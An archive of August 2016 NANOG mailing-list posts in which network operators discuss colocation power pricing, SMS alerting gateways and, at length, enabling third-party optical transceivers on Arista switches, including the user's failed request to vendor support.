neilltech.com Wed Aug 17 16:55:30 2016 From: keiths at neilltech.com (Keith Stokes) Date: Wed, 17 Aug 2016 16:55:30 +0000 Subject: Comparing carrier hotels and colo: How much are you paying per 208V 30A circuit In-Reply-To: References: <7017A8B6-F9C3-4818-98B7-9896C6B9BF06@ianai.net> Message-ID: <5D8E99EF-D6B0-47BB-9D2E-66086EA7F8B1@neilltech.com> We?re grandfathered to power being available with rack, and $hundreds to $thousands per month for 208V/30A HA depending upon the facility. These sites are not West Coast. On Aug 17, 2016, at 11:48 AM, Eric Kuhnke > wrote: Of course I know all of the above exist and are available. Looking more into the cost difference between facilities that sell 'basic' backed power (where you absolutely need to install your own rectifier and battery plant) vs facilities that sell 30A circuits they claim meet the definition of high availability. I have seen a lot of prices already and know that just the $/MRC for power is occasionally not under NDA, so those who wish to share their costs might do so in a general way without naming a specific facility... Looking at west coast states (CA/OR/WA) primarily. On Wed, Aug 17, 2016 at 9:41 AM, Patrick W. Gilmore > wrote: L6-30s are probably the most common power drop in colocation. A) Is proprietary. I won?t pretend you will get zero answers, lots of people will likely break their NDAs. B) You can find any and all of those options. C) Ditto. Are you looking for specific cities or buildings? Or just trying to see if it is available? -- TTFN, patrick On Aug 17, 2016, at 12:37 PM, Eric Kuhnke > wrote: a) How much, in $/mo b) To what degree is it protected (1+0 generator, 1+1 generator, N+1 generator, single UPS, 1+1 UPS, etc). c) What extent of diversity were you able to obtain vs. your other AC circuits (unique riser? separate transformer? separate power feed from second route into the building?) --- Keith Stokes From dhubbard at dino.hostasaurus.com Wed Aug 17 18:13:54 2016 From: dhubbard at dino.hostasaurus.com (David Hubbard) Date: Wed, 17 Aug 2016 18:13:54 +0000 Subject: Email to text - vtext.com blacklisting ip In-Reply-To: <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com> References: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com> <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com> Message-ID: We?d experienced similar, plus, email to text doesn?t work if the path between alerting system and email gateway is broken. We bought a few of these cellular gateways: http://www.smseagle.eu/ Then I went into a t-mobile store and bought a few $25/mo SIM cards, put credit card on file to auto renew each month, slapped them in, and pointed our NMS?s at them. Now we can send SMS alerts from each facility and have had no reliability issues. There?s an easy to write for http interface, and many common things, like Zabbix or Nagios, already have modules written. David On 8/16/16, 7:33 PM, "NANOG on behalf of Sam Norris" wrote: Same boat... We are sending messages to PHONENUMBER at vtext.com and getting bouncebacks or lost items. I assume its because some limits are now being put into place. We are a Verizon subscriber so I am paying, it is not a free service. But .... I am totally up for paid services if you can recommend some that will reliably get us texts to our verizon phones. Sam > -----Original Message----- > From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Ryan, Spencer > Sent: Tuesday, August 16, 2016 4:17 PM > To: Josh Luthman; Mike > Cc: NANOG list > Subject: RE: Email to text - vtext.com blacklisting ip > > I agree. Pay Pager duty or a SMS gateway with a SLA. Relying on the free service > for anything critical is asking for trouble. > > > > Sent from my Verizon, Samsung Galaxy smartphone > > > -------- Original message -------- > From: Josh Luthman > Date: 8/16/16 6:09 PM (GMT-05:00) > To: Mike > Cc: NANOG list > Subject: Re: Email to text - vtext.com blacklisting ip > > If it's critical I'd suggest a service than can depended on... > > Josh Luthman > Office: 937-552-2340 > Direct: 937-552-2343 > 1100 Wayne St > Suite 1337 > Troy, OH 45373 > > On Aug 16, 2016 5:45 PM, "Mike" wrote: > > > Hi, > > > > > > I have a server that monitors my network and issues text messages if > > there are events of note that require human intervention. There is some > > process filtering that ensures it also is not able to issue more than 1 > > alert maximum per 5 minutes, to ensure it doesn't flood pagers with > > messages all screaming the sky is falling when things are not going well. > > Recently however, this server is no longer able to deliver messages to > > vtext.com - it gets nothing but 554 errors: > > > > > > telnet 69.78.67.53 25 > > Trying 69.78.67.53... > > Connected to 69.78.67.53. > > Escape character is '^]'. > > 554 txslspamp10.vtext.com > > Connection closed by foreign host. > > > > Granted on some days during challenging times it can send 30 or 40 > > messages before we get to it and get it squelched / silenced, but it's > > otherwise reasonably well behaved IMHO and I don't think we are any heavy > > volume sender. So I am trying to figure out why it's blacklisted then and > > am rolling snake eyes. If anyone who is an admin for verizon or who has > > any insight to share I'd certainly appreciate it. Email to text is a > > critical function we depend on. > > > > > > Thank you. > > > > > > From me at nek0.net Wed Aug 17 19:50:12 2016 From: me at nek0.net (Stanislaw) Date: Wed, 17 Aug 2016 22:50:12 +0300 Subject: Arista unqualified SFP Message-ID: Hi all, Is there a way for unlocking off-brand transceivers usage on Arista switches? I've got an Arista 7050QX switch with 4.14 EOS version. Then it has been found out that Arista switches seem to not have possibility to unlock off-brand xcievers usage (by some service command or so). I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the checking function bypass the actual check and it helped: ports are not in errdisable state anymore. But despite of xceivers are detected correctly, links aren't coming up (they are in notconnect state). If anyone possibly have does have a sacred knowledge of bringing off-branded transceivers to life on Arista switches, your help'd be very appreciated. Thanks. From sryan at arbor.net Wed Aug 17 19:52:51 2016 From: sryan at arbor.net (Ryan, Spencer) Date: Wed, 17 Aug 2016 19:52:51 +0000 Subject: Arista unqualified SFP In-Reply-To: References: Message-ID: Yes, email support and ask for the unlock code, they will make you agree that you know that 3rd party optics may explode the switch and it's not their fault. The command they give you will have a key/hash built into it (but will work on any switch) that ties the "unlock" to your org. Ours looks like this: service unsupported-transceiver DescriptionOfKeyFromAristaGoesHere 0000000000 (hex key) Spencer Ryan | Senior Systems Administrator | sryan at arbor.net Arbor Networks +1.734.794.5033 (d) | +1.734.846.2053 (m) www.arbornetworks.com ________________________________ From: NANOG on behalf of Stanislaw Sent: Wednesday, August 17, 2016 3:50:12 PM To: nanog at nanog.org Subject: Arista unqualified SFP Hi all, Is there a way for unlocking off-brand transceivers usage on Arista switches? I've got an Arista 7050QX switch with 4.14 EOS version. Then it has been found out that Arista switches seem to not have possibility to unlock off-brand xcievers usage (by some service command or so). I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the checking function bypass the actual check and it helped: ports are not in errdisable state anymore. But despite of xceivers are detected correctly, links aren't coming up (they are in notconnect state). If anyone possibly have does have a sacred knowledge of bringing off-branded transceivers to life on Arista switches, your help'd be very appreciated. Thanks. From jackson.tim at gmail.com Wed Aug 17 19:57:24 2016 From: jackson.tim at gmail.com (Tim Jackson) Date: Wed, 17 Aug 2016 14:57:24 -0500 Subject: Arista unqualified SFP In-Reply-To: References: Message-ID: I'd suggest bitching and moaning at your account team & support until they give you the key to unlock them.. -- Tim On Wed, Aug 17, 2016 at 2:50 PM, Stanislaw wrote: > Hi all, > Is there a way for unlocking off-brand transceivers usage on Arista > switches? > > I've got an Arista 7050QX switch with 4.14 EOS version. Then it has been > found out that Arista switches seem to not have possibility to unlock > off-brand xcievers usage (by some service command or so). > > I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the > checking function bypass the actual check and it helped: ports are not in > errdisable state anymore. But despite of xceivers are detected correctly, > links aren't coming up (they are in notconnect state). > > If anyone possibly have does have a sacred knowledge of bringing > off-branded transceivers to life on Arista switches, your help'd be very > appreciated. Thanks. > From eric at lumaoptics.net Wed Aug 17 20:17:15 2016 From: eric at lumaoptics.net (Eric Litvin) Date: Wed, 17 Aug 2016 13:17:15 -0700 Subject: Arista unqualified SFP In-Reply-To: References: Message-ID: <9F5BF45A-2595-41E4-B780-32B476741B08@lumaoptics.net> Let me know if you want samples. We can ship today. > On Aug 17, 2016, at 12:50 PM, Stanislaw wrote: > > Hi all, > Is there a way for unlocking off-brand transceivers usage on Arista switches? > > I've got an Arista 7050QX switch with 4.14 EOS version. Then it has been found out that Arista switches seem to not have possibility to unlock off-brand xcievers usage (by some service command or so). > > I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the checking function bypass the actual check and it helped: ports are not in errdisable state anymore. But despite of xceivers are detected correctly, links aren't coming up (they are in notconnect state). > > If anyone possibly have does have a sacred knowledge of bringing off-branded transceivers to life on Arista switches, your help'd be very appreciated. Thanks. From me at nek0.net Wed Aug 17 20:25:47 2016 From: me at nek0.net (Stanislaw) Date: Wed, 17 Aug 2016 23:25:47 +0300 Subject: Arista unqualified SFP In-Reply-To: References: Message-ID: <22a54cac8cc717f87acfedf74e146cae@nek0.net> Hi Tim, Thanks for your expressive answer. Will try it :) Tim Jackson ????? 2016-08-17 22:57: > I'd suggest bitching and moaning at your account team & support until they give you the key to unlock them.. > > -- > Tim > > On Wed, Aug 17, 2016 at 2:50 PM, Stanislaw wrote: > >> Hi all, >> Is there a way for unlocking off-brand transceivers usage on Arista switches? >> >> I've got an Arista 7050QX switch with 4.14 EOS version. Then it has been found out that Arista switches seem to not have possibility to unlock off-brand xcievers usage (by some service command or so). >> >> I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the checking function bypass the actual check and it helped: ports are not in errdisable state anymore. But despite of xceivers are detected correctly, links aren't coming up (they are in notconnect state). >> >> If anyone possibly have does have a sacred knowledge of bringing off-branded transceivers to life on Arista switches, your help'd be very appreciated. Thanks. From ryan.dirocco at totalserversolutions.com Wed Aug 17 20:33:12 2016 From: ryan.dirocco at totalserversolutions.com (Ryan DiRocco) Date: Wed, 17 Aug 2016 20:33:12 +0000 Subject: Arista unqualified SFP In-Reply-To: References: Message-ID: Exactly this, get your unlock key that is tied to your company and you are off to the races, bake it into your standard config. Your SE or support team should be able to get this to you :) -----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Ryan, Spencer Sent: Wednesday, August 17, 2016 3:53 PM To: Stanislaw; nanog at nanog.org Subject: Re: Arista unqualified SFP Yes, email support and ask for the unlock code, they will make you agree that you know that 3rd party optics may explode the switch and it's not their fault. The command they give you will have a key/hash built into it (but will work on any switch) that ties the "unlock" to your org. Ours looks like this: service unsupported-transceiver DescriptionOfKeyFromAristaGoesHere 0000000000 (hex key) Spencer Ryan | Senior Systems Administrator | sryan at arbor.net Arbor Networks +1.734.794.5033 (d) | +1.734.846.2053 (m) www.arbornetworks.com ________________________________ From: NANOG on behalf of Stanislaw Sent: Wednesday, August 17, 2016 3:50:12 PM To: nanog at nanog.org Subject: Arista unqualified SFP Hi all, Is there a way for unlocking off-brand transceivers usage on Arista switches? I've got an Arista 7050QX switch with 4.14 EOS version. Then it has been found out that Arista switches seem to not have possibility to unlock off-brand xcievers usage (by some service command or so). I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the checking function bypass the actual check and it helped: ports are not in errdisable state anymore. But despite of xceivers are detected correctly, links aren't coming up (they are in notconnect state). If anyone possibly have does have a sacred knowledge of bringing off-branded transceivers to life on Arista switches, your help'd be very appreciated. Thanks. From dhubbard at dino.hostasaurus.com Wed Aug 17 20:39:54 2016 From: dhubbard at dino.hostasaurus.com (David Hubbard) Date: Wed, 17 Aug 2016 20:39:54 +0000 Subject: Arista unqualified SFP In-Reply-To: References: Message-ID: We?ve done this as well, and Arista support hasn?t hassled us about anything yet so I?ve been pleased. I?ve been very happy using Flexoptics transceivers in all kinds of equipment too, if anyone?s looking for something they know works, and you get a programmer that will let you code optics to certain vendors switches that don?t have unlock keys. It won?t work on all though, so investigate before investing if that?s a concern. David On 8/17/16, 4:33 PM, "NANOG on behalf of Ryan DiRocco" wrote: Exactly this, get your unlock key that is tied to your company and you are off to the races, bake it into your standard config. Your SE or support team should be able to get this to you :) -----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Ryan, Spencer Sent: Wednesday, August 17, 2016 3:53 PM To: Stanislaw; nanog at nanog.org Subject: Re: Arista unqualified SFP Yes, email support and ask for the unlock code, they will make you agree that you know that 3rd party optics may explode the switch and it's not their fault. The command they give you will have a key/hash built into it (but will work on any switch) that ties the "unlock" to your org. Ours looks like this: service unsupported-transceiver DescriptionOfKeyFromAristaGoesHere 0000000000 (hex key) Spencer Ryan | Senior Systems Administrator | sryan at arbor.net Arbor Networks +1.734.794.5033 (d) | +1.734.846.2053 (m) www.arbornetworks.com ________________________________ From: NANOG on behalf of Stanislaw Sent: Wednesday, August 17, 2016 3:50:12 PM To: nanog at nanog.org Subject: Arista unqualified SFP Hi all, Is there a way for unlocking off-brand transceivers usage on Arista switches? I've got an Arista 7050QX switch with 4.14 EOS version. Then it has been found out that Arista switches seem to not have possibility to unlock off-brand xcievers usage (by some service command or so). I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the checking function bypass the actual check and it helped: ports are not in errdisable state anymore. But despite of xceivers are detected correctly, links aren't coming up (they are in notconnect state). If anyone possibly have does have a sacred knowledge of bringing off-branded transceivers to life on Arista switches, your help'd be very appreciated. Thanks. From lists at mtin.net Wed Aug 17 22:20:38 2016 From: lists at mtin.net (Justin Wilson) Date: Wed, 17 Aug 2016 18:20:38 -0400 Subject: Comparing carrier hotels and colo: How much are you paying per 208V 30A circuit In-Reply-To: References: Message-ID: <3B718C9D-09BA-43C7-AD33-54949BC21F27@mtin.net> Indiana Data Centers: $600-900 per lit rack Chicago $1800 per lit rack Ohio $700-900 per lit rack Justin Wilson j2sw at mtin.net --- http://www.mtin.net Owner/CEO xISP Solutions- Consulting ? Data Centers - Bandwidth http://www.midwest-ix.com COO/Chairman Internet Exchange - Peering - Distributed Fabric > On Aug 17, 2016, at 12:37 PM, Eric Kuhnke wrote: > > a) How much, in $/mo > > b) To what degree is it protected (1+0 generator, 1+1 generator, N+1 > generator, single UPS, 1+1 UPS, etc). > > c) What extent of diversity were you able to obtain vs. your other AC > circuits (unique riser? separate transformer? separate power feed from > second route into the building?) > From josh at kyneticwifi.com Wed Aug 17 22:37:12 2016 From: josh at kyneticwifi.com (Josh Reynolds) Date: Wed, 17 Aug 2016 17:37:12 -0500 Subject: Comparing carrier hotels and colo: How much are you paying per 208V 30A circuit In-Reply-To: <3B718C9D-09BA-43C7-AD33-54949BC21F27@mtin.net> References: <3B718C9D-09BA-43C7-AD33-54949BC21F27@mtin.net> Message-ID: Assuming a single 208/30 feed, he also asked about redundancy. On Aug 17, 2016 5:23 PM, "Justin Wilson" wrote: > Indiana Data Centers: > $600-900 per lit rack > > > Chicago > $1800 per lit rack > > > Ohio > $700-900 per lit rack > > > Justin Wilson > j2sw at mtin.net > > --- > http://www.mtin.net Owner/CEO > xISP Solutions- Consulting ? Data Centers - Bandwidth > > http://www.midwest-ix.com COO/Chairman > Internet Exchange - Peering - Distributed Fabric > > > On Aug 17, 2016, at 12:37 PM, Eric Kuhnke wrote: > > > > a) How much, in $/mo > > > > b) To what degree is it protected (1+0 generator, 1+1 generator, N+1 > > generator, single UPS, 1+1 UPS, etc). > > > > c) What extent of diversity were you able to obtain vs. your other AC > > circuits (unique riser? separate transformer? separate power feed from > > second route into the building?) > > > > From jhall at futuresouth.us Wed Aug 17 23:11:59 2016 From: jhall at futuresouth.us (Jonathan Hall) Date: Thu, 18 Aug 2016 01:11:59 +0200 Subject: Zayo Extortion In-Reply-To: <56221.1471438917@turing-police.cc.vt.edu> References: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> <2803E274-0AFF-4AA5-B0D0-898457E34081@futuresouth.us> <56221.1471438917@turing-police.cc.vt.edu> Message-ID: <8CF557E0-9451-4C11-924C-0AC6F2E4080B@futuresouth.us> Guys, Actually, thank you for the responses. I was hoping you wouldn?t take my attempt at friendly and humorous conversation the wrong way. I appreciate the education on the topic, as well. :) However, I?d like to ask a few questions on it, if you don?t mind? (Also - you?re right, it?s not the freedom of speech act I?m thinking, wasn?t it some form of ?decency act? ? I digress, though?) For something to actually be considered libel, isn?t it required that the statement be untrue, damaging in a way that must be proven and actually knowingly false? Proving damages would be hard? But putting that aside, proving what he is saying is not true (unless it?s just 100% false and they have recorded evidence of it) might be even harder if they don?t have proper records of past due balances, or properly recorded communications (i.e. email). And where is the line drawn with regards to him/her knowingly making statements that are not true? And wouldn?t it still alsol require a general purpose public figure, or a limited purpose public figure, to prove malice in the instance? I don?t think the company would qualify as a general or limited purpose public figure. That would pretty much apply to actors, performer and/or social activist types - or politicians. Not a service provider? If he perceives it to be extortion, then it would be difficult to say that him claiming extortion is libel. The definition of extortion is the general practice of obtaining something, especially money, through the use of force or threats. In this case, the company is using the threat of disconnection as the force, and they are indeed attempting to collect money. So, if we take it from a literal definitive view of ?extortion,? the word, by definition, fits the scenario. It doesn?t imply wrong doing, really, and could be applicable to any and every service provider in existence today - even the pharmaceutical companies with regards to withholding medication that can save lives unless absurd amounts of money is paid. I?d say the entire world could be classified as extortionists if we go by the actual definition. J > On 17 Aug 2016, at 15:01, Valdis.Kletnieks at vt.edu wrote: > > On Wed, 17 Aug 2016 01:11:09 +0200, Jonathan Hall said: >> And either way, defamation requires some form of punitive damage be proven in >> order to act ually win that case. > > In addition to the other things already pointed out, punitive damage doesn't > need to be proven. > > *Actual* damages have to be proven. Punitive damages are damages added > as punishment, to make sure the responsible party learned their lesson. > > So fir instance, if a corporation's negligence results in a worker's death, > his family may be awarded $5M in actual damages for the loss of their loved > one - and then another $20 million in punitive damages, to make the corporation > (and possibly the industry segment as a whole) take notice that sort of > negligent behavior will not be tolerated.... > From job at instituut.net Wed Aug 17 23:22:33 2016 From: job at instituut.net (Job Snijders) Date: Thu, 18 Aug 2016 01:22:33 +0200 Subject: Zayo Extortion In-Reply-To: <8CF557E0-9451-4C11-924C-0AC6F2E4080B@futuresouth.us> References: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> <2803E274-0AFF-4AA5-B0D0-898457E34081@futuresouth.us> <56221.1471438917@turing-police.cc.vt.edu> <8CF557E0-9451-4C11-924C-0AC6F2E4080B@futuresouth.us> Message-ID: <20160817232233.GK47197@vurt.meerval.net> Dear nanog, I'm asking the group to stay focussed on network operator topics. While I appreciate the time and effort spend on the original legal research in this thread, I fear the problem space of what defines libel or slander is too far removed from the mailing list charter as described here: https://www.nanog.org/list Thanks! Kind regards, Job From eric.kuhnke at gmail.com Wed Aug 17 23:23:39 2016 From: eric.kuhnke at gmail.com (Eric Kuhnke) Date: Wed, 17 Aug 2016 16:23:39 -0700 Subject: Comparing carrier hotels and colo: How much are you paying per 208V 30A circuit In-Reply-To: References: <3B718C9D-09BA-43C7-AD33-54949BC21F27@mtin.net> Message-ID: And the price difference between the many possibly varying levels of redundancy. On Aug 17, 2016 3:38 PM, "Josh Reynolds" wrote: > Assuming a single 208/30 feed, he also asked about redundancy. > > On Aug 17, 2016 5:23 PM, "Justin Wilson" wrote: > > > Indiana Data Centers: > > $600-900 per lit rack > > > > > > Chicago > > $1800 per lit rack > > > > > > Ohio > > $700-900 per lit rack > > > > > > Justin Wilson > > j2sw at mtin.net > > > > --- > > http://www.mtin.net Owner/CEO > > xISP Solutions- Consulting ? Data Centers - Bandwidth > > > > http://www.midwest-ix.com COO/Chairman > > Internet Exchange - Peering - Distributed Fabric > > > > > On Aug 17, 2016, at 12:37 PM, Eric Kuhnke > wrote: > > > > > > a) How much, in $/mo > > > > > > b) To what degree is it protected (1+0 generator, 1+1 generator, N+1 > > > generator, single UPS, 1+1 UPS, etc). > > > > > > c) What extent of diversity were you able to obtain vs. your other AC > > > circuits (unique riser? separate transformer? separate power feed > from > > > second route into the building?) > > > > > > > > From me at nek0.net Thu Aug 18 10:24:05 2016 From: me at nek0.net (Stanislaw) Date: Thu, 18 Aug 2016 13:24:05 +0300 Subject: Arista unqualified SFP In-Reply-To: <22a54cac8cc717f87acfedf74e146cae@nek0.net> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> Message-ID: Hi all, If somebody is following my epic adventure of getting uqualified SFP to work on Aristas, here is the unhappy end of it. I've written to Arista support and got the following dialogue: Support guy: Hi, Thank you for contacting Arista Support. My name is **** and I'll be assisting you on this case. Could you please provide the "show version" output from this switch? Me: Hi, Here it is: Support guy: Hi, Thank you for the information. Unfortunately, we are unable to activate your 3rd party components. To ensure ongoing quality, Arista devices are designed to support only properly qualified transceivers. Please let me know if you have any other questions. Me: I do not understand, But there is a command which allows using non-Arista transceivers. Why have you implemented it but don't provide an access key to your customers when they ask for it? If it is required to sign some papers which declare that I am aware of all the risks and losing my warranty - I agree with that, lets do it. Any way what are the conditions to receive that access key? Support guy: I'm afraid that there is nothing I'm able to do regarding this situation. If you have any other questions regarding enabling 3rd party options in Arista switches, I suggest to contact your local account team (or sales) for further discussion on this matter. Next, i've tried inserting various QSFP+ DAC cables I have - none of them has been even detected on the switch, it was acting like nothing has been inserted. I guess that even if I get the key, most of my transceivers/DAC (which work like a champ in Juniper or Extreme switches) cables wouldnt work. I'm writing this post to make somebody who considers buying their switches be aware of what they'd get. Just buy Juniper instead. Stanislaw wrote at 2016-08-17 23:25: > Hi Tim, > > Thanks for your expressive answer. Will try it :) > > Tim Jackson ????? 2016-08-17 22:57: > >> I'd suggest bitching and moaning at your account team & support until >> they give you the key to unlock them.. >> >> -- >> Tim >> >> On Wed, Aug 17, 2016 at 2:50 PM, Stanislaw wrote: >> >>> Hi all, >>> Is there a way for unlocking off-brand transceivers usage on Arista >>> switches? >>> >>> I've got an Arista 7050QX switch with 4.14 EOS version. Then it has >>> been found out that Arista switches seem to not have possibility to >>> unlock off-brand xcievers usage (by some service command or so). >>> >>> I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the >>> checking function bypass the actual check and it helped: ports are >>> not in errdisable state anymore. But despite of xceivers are detected >>> correctly, links aren't coming up (they are in notconnect state). >>> >>> If anyone possibly have does have a sacred knowledge of bringing >>> off-branded transceivers to life on Arista switches, your help'd be >>> very appreciated. Thanks. From dovid at telecurve.com Thu Aug 18 11:29:17 2016 From: dovid at telecurve.com (Dovid Bender) Date: Thu, 18 Aug 2016 11:29:17 +0000 Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> Message-ID: <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> And I was about to jump on to the Arista train..... Regards, Dovid -----Original Message----- From: Stanislaw Sender: "NANOG" Date: Thu, 18 Aug 2016 13:24:05 To: nanog list Subject: Re: Arista unqualified SFP Hi all, If somebody is following my epic adventure of getting uqualified SFP to work on Aristas, here is the unhappy end of it. I've written to Arista support and got the following dialogue: Support guy: Hi, Thank you for contacting Arista Support. My name is **** and I'll be assisting you on this case. Could you please provide the "show version" output from this switch? Me: Hi, Here it is: Support guy: Hi, Thank you for the information. Unfortunately, we are unable to activate your 3rd party components. To ensure ongoing quality, Arista devices are designed to support only properly qualified transceivers. Please let me know if you have any other questions. Me: I do not understand, But there is a command which allows using non-Arista transceivers. Why have you implemented it but don't provide an access key to your customers when they ask for it? If it is required to sign some papers which declare that I am aware of all the risks and losing my warranty - I agree with that, lets do it. Any way what are the conditions to receive that access key? Support guy: I'm afraid that there is nothing I'm able to do regarding this situation. If you have any other questions regarding enabling 3rd party options in Arista switches, I suggest to contact your local account team (or sales) for further discussion on this matter. Next, i've tried inserting various QSFP+ DAC cables I have - none of them has been even detected on the switch, it was acting like nothing has been inserted. I guess that even if I get the key, most of my transceivers/DAC (which work like a champ in Juniper or Extreme switches) cables wouldnt work. I'm writing this post to make somebody who considers buying their switches be aware of what they'd get. Just buy Juniper instead. Stanislaw wrote at 2016-08-17 23:25: > Hi Tim, > > Thanks for your expressive answer. Will try it :) > > Tim Jackson ????? 2016-08-17 22:57: > >> I'd suggest bitching and moaning at your account team & support until >> they give you the key to unlock them.. >> >> -- >> Tim >> >> On Wed, Aug 17, 2016 at 2:50 PM, Stanislaw wrote: >> >>> Hi all, >>> Is there a way for unlocking off-brand transceivers usage on Arista >>> switches? >>> >>> I've got an Arista 7050QX switch with 4.14 EOS version. Then it has >>> been found out that Arista switches seem to not have possibility to >>> unlock off-brand xcievers usage (by some service command or so). >>> >>> I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the >>> checking function bypass the actual check and it helped: ports are >>> not in errdisable state anymore. But despite of xceivers are detected >>> correctly, links aren't coming up (they are in notconnect state). >>> >>> If anyone possibly have does have a sacred knowledge of bringing >>> off-branded transceivers to life on Arista switches, your help'd be >>> very appreciated. Thanks. From youssef at 720.fr Thu Aug 18 11:41:07 2016 From: youssef at 720.fr (Youssef Bengelloun-Zahr) Date: Thu, 18 Aug 2016 13:41:07 +0200 Subject: Arista unqualified SFP In-Reply-To: <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> Message-ID: <4705B9D1-6A5A-46E5-9B42-53CCD93A456D@720.fr> Hello all, At my actual job, some colleagues bought Arista switchs very recently. They asked the question about 3rd party transceivers and their SE told them exactly what has been said before : "we do accept 3rd party transceivers but we don't support them. If you still want to use them willingly, you'll have to sign a discharge paper and we'll provide you with a key to activate on your equipement". That's Arista's official policy regarding 3rd party transceivers. HTH. BR. > Le 18 ao?t 2016 ? 13:29, Dovid Bender a ?crit : > > And I was about to jump on to the Arista train..... > > Regards, > > Dovid > > -----Original Message----- > From: Stanislaw > Sender: "NANOG" Date: Thu, 18 Aug 2016 13:24:05 > To: nanog list > Subject: Re: Arista unqualified SFP > > Hi all, > If somebody is following my epic adventure of getting uqualified SFP to > work on Aristas, here is the unhappy end of it. > > I've written to Arista support and got the following dialogue: > Support guy: > Hi, > Thank you for contacting Arista Support. My name is **** and I'll be > assisting you on this case. > Could you please provide the "show version" output from this switch? > > Me: > Hi, > Here it is: > > > Support guy: > Hi, > Thank you for the information. > Unfortunately, we are unable to activate your 3rd party components. To > ensure ongoing quality, Arista devices are designed to support only > properly qualified transceivers. > Please let me know if you have any other questions. > > Me: > I do not understand, > But there is a command which allows using non-Arista transceivers. Why > have you implemented it but don't provide an access key to your > customers when they ask for it? > If it is required to sign some papers which declare that I am aware of > all the risks and losing my warranty - I agree with that, lets do it. > Any way what are the conditions to receive that access key? > > Support guy: > I'm afraid that there is nothing I'm able to do regarding this > situation. If you have any other questions regarding enabling 3rd party > options in Arista switches, I suggest to contact your local account team > (or sales) for further discussion on this matter. > > > Next, i've tried inserting various QSFP+ DAC cables I have - none of > them has been even detected on the switch, it was acting like nothing > has been inserted. I guess that even if I get the key, most of my > transceivers/DAC (which work like a champ in Juniper or Extreme > switches) cables wouldnt work. > > I'm writing this post to make somebody who considers buying their > switches be aware of what they'd get. Just buy Juniper instead. > > > Stanislaw wrote at 2016-08-17 23:25: >> Hi Tim, >> >> Thanks for your expressive answer. Will try it :) >> >> Tim Jackson ????? 2016-08-17 22:57: >> >>> I'd suggest bitching and moaning at your account team & support until >>> they give you the key to unlock them.. >>> >>> -- >>> Tim >>> >>>> On Wed, Aug 17, 2016 at 2:50 PM, Stanislaw wrote: >>>> >>>> Hi all, >>>> Is there a way for unlocking off-brand transceivers usage on Arista >>>> switches? >>>> >>>> I've got an Arista 7050QX switch with 4.14 EOS version. Then it has >>>> been found out that Arista switches seem to not have possibility to >>>> unlock off-brand xcievers usage (by some service command or so). >>>> >>>> I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the >>>> checking function bypass the actual check and it helped: ports are >>>> not in errdisable state anymore. But despite of xceivers are detected >>>> correctly, links aren't coming up (they are in notconnect state). >>>> >>>> If anyone possibly have does have a sacred knowledge of bringing >>>> off-branded transceivers to life on Arista switches, your help'd be >>>> very appreciated. Thanks. From mark.tinka at seacom.mu Thu Aug 18 11:46:55 2016 From: mark.tinka at seacom.mu (Mark Tinka) Date: Thu, 18 Aug 2016 13:46:55 +0200 Subject: Arista unqualified SFP In-Reply-To: <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> Message-ID: <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> On 18/Aug/16 13:29, Dovid Bender wrote: > And I was about to jump on to the Arista train..... Your AM team will gladly unlock this for you. This is probably just a procedural issue with Arista TAC not knowing the secret sauce. Mark. From denys at visp.net.lb Thu Aug 18 11:47:00 2016 From: denys at visp.net.lb (Denys Fedoryshchenko) Date: Thu, 18 Aug 2016 14:47:00 +0300 Subject: Arista unqualified SFP In-Reply-To: <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> Message-ID: <3f3e2f6d286b7c952fa5364664d0e822@nuclearcat.com> Same here, i was considering Arista, because they are quite cost effective,feature rich, interesting hardware for developing some custom solutions. But no more, after reading about unreasonable vendor lock-in. But such inflexibility are very bad sign, this "openness" looks like marketing only, under the hood it seems worse than other solutions on market. Also when support shows such inflexibility, it is very bad sign. And very sad. On 2016-08-18 14:29, Dovid Bender wrote: > And I was about to jump on to the Arista train..... > > Regards, > > Dovid > > -----Original Message----- > From: Stanislaw > Sender: "NANOG" Date: Thu, 18 Aug 2016 > 13:24:05 > To: nanog list > Subject: Re: Arista unqualified SFP > > Hi all, > If somebody is following my epic adventure of getting uqualified SFP to > work on Aristas, here is the unhappy end of it. > > I've written to Arista support and got the following dialogue: > Support guy: > Hi, > Thank you for contacting Arista Support. My name is **** and I'll be > assisting you on this case. > Could you please provide the "show version" output from this switch? > > Me: > Hi, > Here it is: > > > Support guy: > Hi, > Thank you for the information. > Unfortunately, we are unable to activate your 3rd party components. To > ensure ongoing quality, Arista devices are designed to support only > properly qualified transceivers. > Please let me know if you have any other questions. > > Me: > I do not understand, > But there is a command which allows using 